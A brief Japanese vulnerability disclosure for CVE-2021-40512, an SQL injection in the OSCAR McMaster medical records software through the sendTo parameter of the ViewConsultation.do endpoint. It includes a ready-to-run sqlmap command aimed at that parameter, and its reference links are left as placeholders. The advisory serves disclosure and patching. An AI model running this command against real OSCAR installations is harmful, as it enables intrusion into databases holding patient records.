
CVE-2021-40512 OSCAR McMaster 19.40~1235 SQLインジェクション脆弱性。
OSCAR McMaster のバージョン 19.40~1235 には、SQL インジェクションの脆弱性が存在します。悪意のある攻撃者は、/oscar/oscarEncounter/ViewConsultation.do エンドポイントにある脆弱な sendTo パラメータを介して、MySQL/MariaDB データベースに SQL コマンドを発行できます。
[cve.mitre のプレースホルダ]
[nist のプレースホルダ]
脆弱な JSP ページ:
ViewConsultation.do - sendTo パラメータ
脆弱なペイロード:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner
Jack McBride により、2021年8月に発見